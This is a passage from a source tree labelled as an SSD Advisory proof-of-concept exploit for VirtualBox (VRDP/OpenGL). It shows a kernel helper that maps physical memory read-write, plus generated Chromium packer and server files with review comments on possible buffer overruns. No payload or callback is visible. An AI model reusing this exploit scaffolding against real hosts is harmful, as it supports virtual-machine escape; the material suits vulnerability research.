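 * NTSTATUS returned by ZwOpenSection/ZwMapViewOfSection. The view is
 * PAGE_READWRITE | PAGE_WRITECOMBINE (device-memory style caching); release it
 * with MyUnmapVirtual(). The section handle is a temporary and is closed on
 * every path -- the previous version leaked it when the map call failed.
 */
NTSTATUS
MyMapPhysicalToVirtual(PVOID* virtOut, PHYSICAL_ADDRESS phys, PHYSICAL_ADDRESS physLen) {
    NTSTATUS Status;
    UNICODE_STRING unicodeStr;
    OBJECT_ATTRIBUTES objAttr;
    HANDLE physMemHandle = NULL;
    PVOID virt = NULL;
    SIZE_T viewSize;

    if (virtOut == NULL) {
        return STATUS_INVALID_PARAMETER;
    }
    *virtOut = NULL;

    RtlInitUnicodeString(&unicodeStr, L"\\Device\\PhysicalMemory");
    InitializeObjectAttributes(
        &objAttr,
        &unicodeStr,
        OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
        (HANDLE)NULL,
        (PSECURITY_DESCRIPTOR)NULL);

    // Least privilege: the mapping below only needs map-read/map-write on the
    // section, not SECTION_ALL_ACCESS.
    Status = ZwOpenSection(&physMemHandle, SECTION_MAP_READ | SECTION_MAP_WRITE, &objAttr);
    if (Status != STATUS_SUCCESS) {
        return Status;
    }

    // ViewSize is in/out (the kernel writes back the size actually mapped).
    // Use a properly typed SIZE_T instead of aliasing the LONGLONG QuadPart
    // through a PULONG_PTR, which only covers its low half on 32-bit builds.
    viewSize = (SIZE_T)physLen.QuadPart;
    Status = ZwMapViewOfSection(
        physMemHandle,
        NtCurrentProcess(),
        &virt,
        0,                  // ZeroBits
        viewSize,           // CommitSize
        &phys,              // SectionOffset
        &viewSize,          // ViewSize (in/out)
        ViewUnmap,
        0,                  // AllocationType
        PAGE_READWRITE | PAGE_WRITECOMBINE);

    // The handle is only needed to create the view; close it on both the
    // success and the failure path.
    ZwClose(physMemHandle);

    if (Status != STATUS_SUCCESS) {
        return Status;
    }

    *virtOut = virt;
    return STATUS_SUCCESS;
}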
43 |
/*
 * Release a view obtained from MyMapPhysicalToVirtual().
 *
 * virt - base address that was returned through *virtOut by the mapping call.
 * Returns the NTSTATUS of ZwUnmapViewOfSection for the current process.
 */
NTSTATUS
MyUnmapVirtual(PVOID virt) {
    const HANDLE currentProcess = NtCurrentProcess();
    const NTSTATUS status = ZwUnmapViewOfSection(currentProcess, virt);
    return status;
}
48 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/pack_bounds_swap.c:
--------------------------------------------------------------------------------
1 | /* THIS FILE IS AUTOGENERATED FROM E:/home/src/VirtualBox/src/VBox/GuestHost/OpenGL/packer/pack_bounds.c BY pack_swap.py */
2 |
3 |
4 | /* Copyright (c) 2001, Stanford University
5 | * All rights reserved
6 | *
7 | * See the file LICENSE.txt for information on redistributing this software.
8 | */
9 |
10 | #include "packer.h"
11 | #include "cr_opcodes.h"
12 | #include "cr_mem.h"
13 |
/* Pack one CR_BOUNDSINFOCR record in byte-swapped form: a 24-byte header
 * (total length, bounds x1/y1/x2/y2, opcode count), then 0-3 bytes of 0xff
 * filler opcodes, then `payload`, so that the record ends on a 4-byte boundary.
 *
 * Unlike the other pack_*_swap.c functions this one does not go through
 * CR_GET_BUFFERED_POINTER: per the original comment below the caller has
 * already verified that 24 + align4(len) bytes fit, so nothing here re-checks
 * the remaining buffer space.
 * NOTE(review): `len` is a signed GLint used unchecked in len_aligned and
 * crMemcpy -- a negative value would wrap; confirm callers guarantee len >= 0.
 */
14 | void PACK_APIENTRY crPackBoundsInfoCRSWAP( CR_PACKER_CONTEXT_ARGDECL const CRrecti *bounds, const GLbyte *payload, GLint len, GLint num_opcodes )
15 | {
16 | CR_GET_PACKER_CONTEXT(pc);
17 | /* Don't get the buffered_ptr here because we've already
18 | * verified that there's enough space for everything. */
19 |
20 | unsigned char *data_ptr;
21 | int len_aligned, total_len;
22 |
23 | CR_LOCK_PACKER_CONTEXT(pc); /* explicit lock, since CR_GET_BUFFERED_POINTER is skipped here */
24 |
25 | data_ptr = pc->buffer.data_current; /* WRITE_DATA below presumably writes relative to data_ptr */
26 | len_aligned = ( len + 0x3 ) & ~0x3; /* payload length rounded up to a multiple of 4 */
27 | total_len = 24 + len_aligned;
28 |
29 | WRITE_DATA(0, int, SWAP32(total_len)); /* header: total record length incl. padding */
30 | WRITE_DATA(4, int, SWAP32(bounds->x1));
31 | WRITE_DATA(8, int, SWAP32(bounds->y1));
32 | WRITE_DATA(12, int, SWAP32(bounds->x2));
33 | WRITE_DATA(16, int, SWAP32(bounds->y2));
34 | WRITE_DATA(20, int, SWAP32(num_opcodes)); /* how many opcodes the payload carries */
35 |
36 | /* skip the BOUNDSINFO */
37 | data_ptr += 24;
38 |
39 | /* put in padding opcodes (deliberately bogus) */
40 | switch ( len_aligned - len ) /* 0..3 filler bytes go in front of the payload */
41 | {
42 | case 3: *data_ptr++ = 0xff; RT_FALL_THRU();
43 | case 2: *data_ptr++ = 0xff; RT_FALL_THRU();
44 | case 1: *data_ptr++ = 0xff; RT_FALL_THRU();
45 | default: break;
46 | }
47 |
48 | crMemcpy( data_ptr, payload, len );
49 |
50 | WRITE_OPCODE( pc, CR_BOUNDSINFOCR_OPCODE );
51 | pc->buffer.data_current += 24 + len_aligned; /* advance manually -- no CR_GET_BUFFERED_POINTER did it */
52 | CR_UNLOCK_PACKER_CONTEXT(pc);
53 | }
54 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/pack_clipplane_swap.c:
--------------------------------------------------------------------------------
1 | /* THIS FILE IS AUTOGENERATED FROM E:/home/src/VirtualBox/src/VBox/GuestHost/OpenGL/packer/pack_clipplane.c BY pack_swap.py */
2 |
3 |
4 | /* Copyright (c) 2001, Stanford University
5 | * All rights reserved
6 | *
7 | * See the file LICENSE.txt for information on redistributing this software.
8 | */
9 |
10 | #include "packer.h"
11 | #include "cr_opcodes.h"
12 |
/* Pack a CR_CLIPPLANE_OPCODE record in byte-swapped form: the plane enum
 * followed by the four doubles of `equation` (36 bytes; this record carries no
 * leading length field, it is fixed-size).
 *
 * CR_GET_BUFFERED_POINTER reserves `packet_length` bytes and, judging by the
 * matching CR_UNLOCK_PACKER_CONTEXT at the end, takes the packer lock -- the
 * statement order matters. `equation` must point at four GLdouble values; it
 * is not validated here.
 */
13 | void PACK_APIENTRY crPackClipPlaneSWAP( GLenum plane, const GLdouble *equation )
14 | {
15 | CR_GET_PACKER_CONTEXT(pc);
16 | unsigned char *data_ptr;
17 | int packet_length = sizeof( plane ) + 4*sizeof(*equation); /* 4 + 4*8 = 36 bytes */
18 | CR_GET_BUFFERED_POINTER(pc, packet_length );
19 | WRITE_DATA(0, GLenum, SWAP32(plane));
20 | WRITE_SWAPPED_DOUBLE( 4, equation[0] ); /* doubles at 8-byte stride after the 4-byte enum */
21 | WRITE_SWAPPED_DOUBLE( 12, equation[1] );
22 | WRITE_SWAPPED_DOUBLE( 20, equation[2] );
23 | WRITE_SWAPPED_DOUBLE( 28, equation[3] );
24 | WRITE_OPCODE( pc, CR_CLIPPLANE_OPCODE );
25 | CR_UNLOCK_PACKER_CONTEXT(pc);
26 | }
27 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/pack_fog_swap.c:
--------------------------------------------------------------------------------
1 | /* THIS FILE IS AUTOGENERATED FROM E:/home/src/VirtualBox/src/VBox/GuestHost/OpenGL/packer/pack_fog.c BY pack_swap.py */
2 |
3 |
4 | /* Copyright (c) 2001, Stanford University
5 | * All rights reserved
6 | *
7 | * See the file LICENSE.txt for information on redistributing this software.
8 | */
9 |
10 | #include "packer.h"
11 | #include "cr_opcodes.h"
12 |
/* Build the body of a byte-swapped Fogfv/Fogiv record:
 *   [packet_length][pname][params x 1 or 4]
 * The caller owns the packer context and appends the opcode.
 *
 * params_length is 4 bytes for the scalar fog pnames, 16 for GL_FOG_COLOR, and
 * whatever __packFogParamsLength() reports for other (extension) pnames. An
 * unknown pname raises GL_INVALID_ENUM through __PackError and returns
 * GL_FALSE before any buffer space is reserved, so the caller must not emit
 * the opcode in that case.
 *
 * Returns GL_TRUE when a record was written, GL_FALSE otherwise.
 *
 * NOTE(review): the `packet_length > 12` branch writes params[1..3]
 * unconditionally. That is right for GL_FOG_COLOR, but if
 * __packFogParamsLength() can ever return 2 or 3 floats (8/12 bytes) this
 * would write past the reserved packet_length and read past the caller's
 * params -- confirm that helper's possible return values.
 */
13 | static GLboolean __handleFogData( GLenum pname, const GLfloat *params )
14 | {
15 | CR_GET_PACKER_CONTEXT(pc);
16 | int params_length = 0;
17 | int packet_length = sizeof( int ) + sizeof( pname ); /* 8-byte header */
18 | unsigned char *data_ptr;
19 | switch( pname )
20 | {
21 | case GL_FOG_MODE:
22 | case GL_FOG_DENSITY:
23 | case GL_FOG_START:
24 | case GL_FOG_END:
25 | case GL_FOG_INDEX:
26 | params_length = sizeof( *params ); /* one float */
27 | break;
28 | case GL_FOG_COLOR:
29 | params_length = 4*sizeof( *params ); /* RGBA */
30 | break;
31 | default:
32 | params_length = __packFogParamsLength( pname ); /* extension pnames; 0 means unknown */
33 | if (!params_length)
34 | {
35 | char msg[100];
36 | sprintf(msg, "Invalid pname in Fog: %d", (int) pname ); /* bounded: fixed text plus one int fits msg[100] */
37 | __PackError( __LINE__, __FILE__, GL_INVALID_ENUM, msg);
38 | return GL_FALSE; /* nothing reserved, nothing written */
39 | }
40 | break;
41 | }
42 | packet_length += params_length;
43 |
44 | CR_GET_BUFFERED_POINTER(pc, packet_length ); /* reserves exactly packet_length bytes */
45 | WRITE_DATA(0, int, SWAP32(packet_length));
46 | WRITE_DATA(4, GLenum, SWAP32(pname));
47 | WRITE_DATA(8, GLuint, SWAPFLOAT(params[0]));
48 | if (packet_length > 12) /* more than one parameter, i.e. the 4-float case */
49 | {
50 | WRITE_DATA(12, GLuint, SWAPFLOAT(params[1]));
51 | WRITE_DATA(16, GLuint, SWAPFLOAT(params[2]));
52 | WRITE_DATA(20, GLuint, SWAPFLOAT(params[3]));
53 | }
54 | return GL_TRUE;
55 | }
56 |
/*
 * Emit a byte-swapped glFogfv record.
 *
 * pname/params are handed to __handleFogData(), which reserves the buffer
 * space and writes the packet body; only when that reports GL_TRUE is the
 * CR_FOGFV_OPCODE appended, so an invalid pname produces no opcode at all.
 * The packer context is released at the end on every path.
 */
void PACK_APIENTRY crPackFogfvSWAP(GLenum pname, const GLfloat *params)
{
    CR_GET_PACKER_CONTEXT(pc);
    const GLboolean bodyWritten = __handleFogData( pname, params );
    if (bodyWritten != GL_FALSE)
    {
        WRITE_OPCODE( pc, CR_FOGFV_OPCODE );
    }
    CR_UNLOCK_PACKER_CONTEXT(pc);
}
64 |
/*
 * Emit a byte-swapped glFogiv record.
 *
 * GLint and GLfloat are both 32-bit, so the integer parameters are routed
 * through the float packer unchanged and byte-swapped identically. The
 * CR_FOGIV_OPCODE is appended only when __handleFogData() reports GL_TRUE;
 * the packer context is released at the end on every path.
 */
void PACK_APIENTRY crPackFogivSWAP(GLenum pname, const GLint *params)
{
    CR_GET_PACKER_CONTEXT(pc);
    const GLfloat *asFloats = (const GLfloat *) params;
    const GLboolean bodyWritten = __handleFogData( pname, asFloats );
    if (bodyWritten != GL_FALSE)
    {
        WRITE_OPCODE( pc, CR_FOGIV_OPCODE );
    }
    CR_UNLOCK_PACKER_CONTEXT(pc);
}
73 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/pack_materials_swap.c:
--------------------------------------------------------------------------------
1 | /* THIS FILE IS AUTOGENERATED FROM E:/home/src/VirtualBox/src/VBox/GuestHost/OpenGL/packer/pack_materials.c BY pack_swap.py */
2 |
3 |
4 | /* Copyright (c) 2001, Stanford University
5 | * All rights reserved
6 | *
7 | * See the file LICENSE.txt for information on redistributing this software.
8 | */
9 |
10 | #include "packer.h"
11 | #include "cr_error.h"
12 |
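/* Build the body of a byte-swapped Materialfv/Materialiv record:
 *   [packet_length][face][pname][params x 1, 3 or 4]
 * The caller owns the packer context and appends the opcode.
 *
 * params_length is 16 bytes for the four-component colour pnames, 12 for
 * GL_COLOR_INDEXES and 4 for GL_SHININESS. Any other pname raises
 * GL_INVALID_ENUM via __PackError and returns GL_FALSE before any buffer
 * space is reserved.
 *
 * Returns GL_TRUE when a record was written, GL_FALSE otherwise. The return
 * value is new (the function used to be void) so callers can, like
 * crPackFogfvSWAP, skip the opcode on error; callers that ignore it are
 * unaffected.
 *
 * Fix: the fourth component used to be emitted when
 * `packet_length > 3*sizeof(*params)`, which holds for every pname because
 * the header alone is 12 bytes. For GL_SHININESS and GL_COLOR_INDEXES that
 * wrote params[3] 8 or 4 bytes past the space reserved by
 * CR_GET_BUFFERED_POINTER and read past the caller's 1- or 3-element array.
 * The test is now on params_length. This file is generated from
 * src/VBox/GuestHost/OpenGL/packer/pack_materials.c by pack_swap.py -- apply
 * the same change there or it will be regenerated away.
 */
static GLboolean __handleMaterialData( GLenum face, GLenum pname, const GLfloat *params )
{
    CR_GET_PACKER_CONTEXT(pc);
    unsigned int packet_length = sizeof( int ) + sizeof( face ) + sizeof( pname );
    unsigned int params_length = 0;
    unsigned char *data_ptr;
    switch( pname )
    {
        case GL_AMBIENT:
        case GL_DIFFUSE:
        case GL_SPECULAR:
        case GL_EMISSION:
        case GL_AMBIENT_AND_DIFFUSE:
            params_length = 4*sizeof( *params );
            break;
        case GL_COLOR_INDEXES:
            params_length = 3*sizeof( *params );
            break;
        case GL_SHININESS:
            params_length = sizeof( *params );
            break;
        default:
            __PackError(__LINE__, __FILE__, GL_INVALID_ENUM, "glMaterial(pname)");
            return GL_FALSE;
    }
    packet_length += params_length;

    /* Reserves exactly packet_length bytes; every WRITE_DATA below must stay
     * inside [0, packet_length). */
    CR_GET_BUFFERED_POINTER(pc, packet_length );
    WRITE_DATA(0, int, SWAP32(packet_length));
    WRITE_DATA(sizeof( int ) + 0, GLenum, SWAP32(face));
    WRITE_DATA(sizeof( int ) + 4, GLenum, SWAP32(pname));
    WRITE_DATA(sizeof( int ) + 8, GLuint, SWAPFLOAT(params[0]));
    if (params_length > sizeof( *params ))
    {
        /* GL_COLOR_INDEXES and the four-component pnames */
        WRITE_DATA(sizeof( int ) + 12, GLuint, SWAPFLOAT(params[1]));
        WRITE_DATA(sizeof( int ) + 16, GLuint, SWAPFLOAT(params[2]));
    }
    if (params_length > 3*sizeof( *params ))
    {
        /* four-component pnames only */
        WRITE_DATA(sizeof( int ) + 20, GLuint, SWAPFLOAT(params[3]));
    }
    return GL_TRUE;
}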
55 |
/*
 * Byte-swapping packer for glMaterialfv.
 *
 * The payload is produced by __handleMaterialData; the opcode is then pushed
 * unconditionally, even when the helper rejected pname through __PackError
 * and packed no payload.  (The fog and combiner packers in this directory
 * gate the opcode on the helper's result instead.)
 */
void PACK_APIENTRY crPackMaterialfvSWAP(GLenum face, GLenum pname, const GLfloat *params)
{
    CR_GET_PACKER_CONTEXT(pc);
    const int opcode = CR_MATERIALFV_OPCODE;

    __handleMaterialData(face, pname, params);
    WRITE_OPCODE(pc, opcode);
    CR_UNLOCK_PACKER_CONTEXT(pc);
}
63 |
/*
 * Byte-swapping packer for glMaterialiv.
 *
 * GLint and GLfloat are both 32 bits wide, so the integer array is handed to
 * __handleMaterialData reinterpreted as floats and packed with the same
 * layout; only the opcode tells the receiver which type it was.  As with the
 * fv variant the opcode is pushed even if the helper rejected pname.
 */
void PACK_APIENTRY crPackMaterialivSWAP(GLenum face, GLenum pname, const GLint *params)
{
    CR_GET_PACKER_CONTEXT(pc);
    const GLfloat *asFloats = (const GLfloat *) params;
    const int opcode = CR_MATERIALIV_OPCODE;

    __handleMaterialData(face, pname, asFloats);
    WRITE_OPCODE(pc, opcode);
    CR_UNLOCK_PACKER_CONTEXT(pc);
}
72 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/pack_regcombiner_swap.c:
--------------------------------------------------------------------------------
1 | /* THIS FILE IS AUTOGENERATED FROM E:/home/src/VirtualBox/src/VBox/GuestHost/OpenGL/packer/pack_regcombiner.c BY pack_swap.py */
2 |
3 |
4 | /* Copyright (c) 2001, Stanford University
5 | * All rights reserved
6 | *
7 | * See the file LICENSE.txt for information on redistributing this software.
8 | */
9 |
10 | #include "packer.h"
11 | #include "cr_opcodes.h"
12 |
/*
 * Shared payload packer for the byte-swapped glCombinerParameter{f,i}vNV
 * calls.  Layout:
 *
 *   [packet_length:int][extended_opcode][pname][1 or 4 x 32-bit value]
 *
 * Returns GL_TRUE when a packet was written.  For an unknown pname it reports
 * GL_INVALID_ENUM through __PackError, asserts, and returns GL_FALSE without
 * touching the buffer, so the caller must not emit the opcode in that case.
 */
static GLboolean __handleCombinerParameterData(GLenum pname, const GLfloat *params, GLenum extended_opcode)
{
    CR_GET_PACKER_CONTEXT(pc);
    unsigned int count;          /* number of 32-bit values implied by pname */
    unsigned int params_length;
    unsigned int packet_length;
    unsigned char *data_ptr;

    switch (pname)
    {
    case GL_CONSTANT_COLOR0_NV:
    case GL_CONSTANT_COLOR1_NV:
        count = 4;
        break;
    case GL_NUM_GENERAL_COMBINERS_NV:
    case GL_COLOR_SUM_CLAMP_NV:
        count = 1;
        break;
    default:
        __PackError(__LINE__, __FILE__, GL_INVALID_ENUM,
                    "crPackCombinerParameterSWAP(bad pname)");
        CRASSERT(0);
        return GL_FALSE;
    }

    params_length = count * sizeof(*params);
    packet_length = sizeof(int) + sizeof(extended_opcode) + sizeof(pname) + params_length;

    CR_GET_BUFFERED_POINTER(pc, packet_length);
    WRITE_DATA(0, int, SWAP32(packet_length));
    WRITE_DATA(sizeof(int) + 0, GLenum, SWAP32(extended_opcode));
    WRITE_DATA(sizeof(int) + 4, GLenum, SWAP32(pname));
    WRITE_DATA(sizeof(int) + 8, GLuint, SWAPFLOAT(params[0]));
    if (count > 1)
    {
        /* Only the 4-value pnames get here; the assert pins the packet size. */
        WRITE_DATA(sizeof(int) + 12, GLuint, SWAPFLOAT(params[1]));
        WRITE_DATA(sizeof(int) + 16, GLuint, SWAPFLOAT(params[2]));
        WRITE_DATA(sizeof(int) + 20, GLuint, SWAPFLOAT(params[3]));
        CRASSERT(packet_length == sizeof(int) + 20 + 4);
    }
    return GL_TRUE;
}
51 |
/*
 * Byte-swapping packer for glCombinerParameterfvNV.  The call is carried as
 * an extended opcode: the payload names the real operation, and the opcode
 * stream only gets CR_EXTEND_OPCODE, and only if the helper packed anything.
 */
void PACK_APIENTRY crPackCombinerParameterfvNVSWAP(GLenum pname, const GLfloat *params)
{
    CR_GET_PACKER_CONTEXT(pc);
    GLboolean written;

    written = __handleCombinerParameterData(pname, params, CR_COMBINERPARAMETERFVNV_EXTEND_OPCODE);
    if (written)
    {
        WRITE_OPCODE(pc, CR_EXTEND_OPCODE);
    }
    CR_UNLOCK_PACKER_CONTEXT(pc);
}
59 |
/*
 * Byte-swapping packer for glCombinerParameterivNV.  GLint and GLfloat are
 * both 32 bits wide, so the integer array is packed through the float helper
 * unchanged; the extended opcode in the payload records that it was the iv
 * form.  CR_EXTEND_OPCODE is pushed only when the helper packed a payload.
 */
void PACK_APIENTRY crPackCombinerParameterivNVSWAP(GLenum pname, const GLint *params)
{
    CR_GET_PACKER_CONTEXT(pc);
    const GLfloat *asFloats = (const GLfloat *) params;
    GLboolean written;

    written = __handleCombinerParameterData(pname, asFloats, CR_COMBINERPARAMETERIVNV_EXTEND_OPCODE);
    if (written)
    {
        WRITE_OPCODE(pc, CR_EXTEND_OPCODE);
    }
    CR_UNLOCK_PACKER_CONTEXT(pc);
}
68 |
/*
 * Byte-swapping packer for glCombinerStageParameterfvNV.
 *
 * Fixed 32-byte packet: length, extended opcode, stage, pname and four
 * floats, 4 bytes each.  Unlike the glCombinerParameter packers there is no
 * pname validation here; params is always read as four elements.
 */
void PACK_APIENTRY crPackCombinerStageParameterfvNVSWAP(GLenum stage, GLenum pname, const GLfloat *params)
{
    CR_GET_PACKER_CONTEXT(pc);
    const int packet_length = 32;
    unsigned int i;
    unsigned char *data_ptr;

    CR_GET_BUFFERED_POINTER(pc, packet_length);
    WRITE_DATA(0, GLint, SWAP32(packet_length));
    WRITE_DATA(4, GLenum, SWAP32(CR_COMBINERSTAGEPARAMETERFVNV_EXTEND_OPCODE));
    WRITE_DATA(8, GLenum, SWAP32(stage));
    WRITE_DATA(12, GLenum, SWAP32(pname));
    /* the four float values occupy bytes 16..31 */
    for (i = 0; i < 4; i++)
    {
        WRITE_DATA(16 + 4 * i, GLuint, SWAPFLOAT(params[i]));
    }
    WRITE_OPCODE(pc, CR_EXTEND_OPCODE);
    CR_UNLOCK_PACKER_CONTEXT(pc);
}
86 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/pack_stipple_swap.c:
--------------------------------------------------------------------------------
1 | /* THIS FILE IS AUTOGENERATED FROM E:/home/src/VirtualBox/src/VBox/GuestHost/OpenGL/packer/pack_stipple.c BY pack_swap.py */
2 |
3 |
4 | /* Copyright (c) 2001, Stanford University
5 | * All rights reserved
6 | *
7 | * See the file LICENSE.txt for information on redistributing this software.
8 | */
9 |
10 | #include "packer.h"
11 | #include "cr_opcodes.h"
12 | #include "cr_mem.h"
13 | #include "cr_glstate.h"
14 |
/*
 * Byte-swapping packer for glPolygonStipple.
 *
 * Two packet shapes, selected by whether a GL_PIXEL_UNPACK_BUFFER_ARB is bound
 * (crStateIsBufferBound):
 *   bound     : [flag:int=1][mask pointer value as GLint]  - the pointer is
 *               narrowed to 32 bits through uintptr_t, so its upper half is
 *               discarded; the mask bytes themselves are not copied.
 *   not bound : [flag:int=0][128 bytes of mask]            - a 32x32 1-bit mask.
 * WRITE_DATA_AI advances data_ptr, which is why crMemcpy can write at data_ptr
 * directly after the flag.
 */
void PACK_APIENTRY crPackPolygonStippleSWAP( const GLubyte *mask )
{
    CR_GET_PACKER_CONTEXT(pc);
    const int stippleBytes = 32*32/8;
    const int pboBound = crStateIsBufferBound(GL_PIXEL_UNPACK_BUFFER_ARB);
    const int packet_length = sizeof(int) + (pboBound ? (int)sizeof(GLint) : stippleBytes);
    unsigned char *data_ptr;

    CR_GET_BUFFERED_POINTER(pc, packet_length );
    WRITE_DATA_AI(int, SWAP32(pboBound));
    if (pboBound)
    {
        WRITE_DATA_AI(GLint, SWAP32((GLint)(uintptr_t)mask));
    }
    else
    {
        crMemcpy( data_ptr, mask, stippleBytes );
    }
    WRITE_OPCODE( pc, CR_POLYGONSTIPPLE_OPCODE );
    CR_UNLOCK_PACKER_CONTEXT(pc);
}
40 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/packspu_flush.c:
--------------------------------------------------------------------------------
1 | /* Copyright (c) 2001, Stanford University
2 | All rights reserved.
3 |
4 | See the file LICENSE.txt for information on redistributing this software. */
5 |
6 |
7 | /* DO NOT EDIT - this file generated by packspu_flush.py script */
8 |
9 | /* These are otherwise ordinary functions which require that the buffer be
10 | * flushed immediately after packing the function.
11 | */
12 | #include "cr_glstate.h"
13 | #include "cr_packfunctions.h"
14 | #include "packspu.h"
15 | #include "packspu_proto.h"
16 |
/*
 * glBarrierCreateCR entry point of the pack SPU.  Packs the call with the
 * byte-swapping packer when pack_spu.swap is set, otherwise with the native
 * one, and then flushes the thread's buffer immediately rather than waiting
 * for it to fill.
 */
void PACKSPU_APIENTRY packspu_BarrierCreateCR(GLuint name, GLuint count)
{
    GET_THREAD(thread);

    if (pack_spu.swap)
        crPackBarrierCreateCRSWAP(name, count);
    else
        crPackBarrierCreateCR(name, count);

    packspuFlush((void *) thread);
}
30 |
/*
 * glBarrierExecCR entry point of the pack SPU.  Chooses the swapped or native
 * packer from pack_spu.swap and flushes the thread's buffer right away.
 */
void PACKSPU_APIENTRY packspu_BarrierExecCR(GLuint name)
{
    GET_THREAD(thread);

    if (pack_spu.swap)
        crPackBarrierExecCRSWAP(name);
    else
        crPackBarrierExecCR(name);

    packspuFlush((void *) thread);
}
44 |
/*
 * glSemaphoreCreateCR entry point of the pack SPU.  Chooses the swapped or
 * native packer from pack_spu.swap and flushes the thread's buffer right away.
 */
void PACKSPU_APIENTRY packspu_SemaphoreCreateCR(GLuint name, GLuint count)
{
    GET_THREAD(thread);

    if (pack_spu.swap)
        crPackSemaphoreCreateCRSWAP(name, count);
    else
        crPackSemaphoreCreateCR(name, count);

    packspuFlush((void *) thread);
}
58 |
/*
 * glSemaphorePCR entry point of the pack SPU.  Chooses the swapped or native
 * packer from pack_spu.swap and flushes the thread's buffer right away.
 */
void PACKSPU_APIENTRY packspu_SemaphorePCR(GLuint name)
{
    GET_THREAD(thread);

    if (pack_spu.swap)
        crPackSemaphorePCRSWAP(name);
    else
        crPackSemaphorePCR(name);

    packspuFlush((void *) thread);
}
72 |
/*
 * glSemaphoreVCR entry point of the pack SPU.  Chooses the swapped or native
 * packer from pack_spu.swap and flushes the thread's buffer right away.
 */
void PACKSPU_APIENTRY packspu_SemaphoreVCR(GLuint name)
{
    GET_THREAD(thread);

    if (pack_spu.swap)
        crPackSemaphoreVCRSWAP(name);
    else
        crPackSemaphoreVCR(name);

    packspuFlush((void *) thread);
}
86 |
87 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/server_retval.c:
--------------------------------------------------------------------------------
1 | /* Copyright (c) 2001, Stanford University
2 | All rights reserved.
3 |
4 | See the file LICENSE.txt for information on redistributing this software. */
5 |
6 |
7 | /* DO NOT EDIT - THIS FILE AUTOMATICALLY GENERATED BY server_retval.py SCRIPT */
8 | #include "chromium.h"
9 | #include "cr_mem.h"
10 | #include "cr_net.h"
11 | #include "server_dispatch.h"
12 | #include "server.h"
13 |
/*
 * Send a command's return value back to the current client.
 *
 * Builds a CR_MESSAGE_READBACK message: the fixed CRMessageReadback header,
 * the writeback_ptr / return_ptr currently recorded in cr_server, and then
 * payload_len bytes of payload copied verbatim behind the header.  After the
 * send both recorded pointers are cleared (CRDBGPTR_SETZ).
 *
 * Nothing is sent while a pended command is being processed, while a VM
 * snapshot is being loaded, or when the client connection is a CR_FILE; in
 * the first case the recorded pointers are still cleared, in the other two
 * they are left untouched.
 *
 * NOTE(review): crAlloc's result is used without a NULL check - presumably it
 * aborts on failure, verify.  msg_len is an int built from an unsigned
 * payload_len; the callers in this file only ever pass sizeof of a scalar.
 * cr_server.curClient is dereferenced without a NULL check; presumably every
 * caller runs inside the dispatch of a client command - confirm.
 */
void crServerReturnValue( const void *payload, unsigned int payload_len )
{
    CRMessageReadback *rb;
    int msg_len = sizeof( *rb ) + payload_len;

    if (cr_server.fProcessingPendedCommands)
    {
#ifdef DEBUG_misha
        WARN(("Pending command returns value"));
#endif
        CRDBGPTR_SETZ(&cr_server.writeback_ptr);
        CRDBGPTR_SETZ(&cr_server.return_ptr);
        return;
    }

    /* Don't reply to client if we're loading VM snapshot */
    if (cr_server.bIsInLoadingState)
        return;

    /* File-backed connections get no reply either */
    if (cr_server.curClient->conn->type == CR_FILE)
        return;

    rb = (CRMessageReadback *) crAlloc( msg_len );
    rb->header.type = CR_MESSAGE_READBACK;

    CRDBGPTR_PRINTRB(cr_server.curClient->conn->u32ClientID, &cr_server.writeback_ptr);
    CRDBGPTR_CHECKNZ(&cr_server.writeback_ptr);
    CRDBGPTR_CHECKNZ(&cr_server.return_ptr);

    crMemcpy( &(rb->writeback_ptr), &(cr_server.writeback_ptr), sizeof( rb->writeback_ptr ) );
    crMemcpy( &(rb->readback_ptr), &(cr_server.return_ptr), sizeof( rb->readback_ptr ) );
    crMemcpy( rb + 1, payload, payload_len );   /* payload follows the header */

    crNetSend( cr_server.curClient->conn, NULL, rb, msg_len );

    CRDBGPTR_SETZ(&cr_server.writeback_ptr);
    CRDBGPTR_SETZ(&cr_server.return_ptr);
    crFree( rb );
}
51 |
/*
 * Server-side glCheckFramebufferStatusEXT: forward to the head SPU and ship
 * the status back to the client via crServerReturnValue.  The C return value
 * is kept for the dispatch table but, as the generator notes, will probably
 * be ignored by the caller.
 */
GLenum SERVER_DISPATCH_APIENTRY crServerDispatchCheckFramebufferStatusEXT(GLenum target)
{
    GLenum retval = cr_server.head_spu->dispatch_table.CheckFramebufferStatusEXT(target);

    crServerReturnValue(&retval, sizeof(retval));
    return retval; /* WILL PROBABLY BE IGNORED */
}
/*
 * Server-side glIsEnabled: forward to the head SPU and ship the GLboolean
 * back to the client via crServerReturnValue; the C return value is kept for
 * the dispatch table only.
 */
GLboolean SERVER_DISPATCH_APIENTRY crServerDispatchIsEnabled(GLenum cap)
{
    GLboolean retval = cr_server.head_spu->dispatch_table.IsEnabled(cap);

    crServerReturnValue(&retval, sizeof(retval));
    return retval; /* WILL PROBABLY BE IGNORED */
}
/*
 * Server-side glIsFenceNV: forward to the head SPU and ship the GLboolean
 * back to the client via crServerReturnValue; the C return value is kept for
 * the dispatch table only.
 */
GLboolean SERVER_DISPATCH_APIENTRY crServerDispatchIsFenceNV(GLuint fence)
{
    GLboolean retval = cr_server.head_spu->dispatch_table.IsFenceNV(fence);

    crServerReturnValue(&retval, sizeof(retval));
    return retval; /* WILL PROBABLY BE IGNORED */
}
/*
 * Server-side glIsQueryARB: forward to the head SPU and ship the GLboolean
 * back to the client via crServerReturnValue; the C return value is kept for
 * the dispatch table only.
 */
GLboolean SERVER_DISPATCH_APIENTRY crServerDispatchIsQueryARB(GLuint id)
{
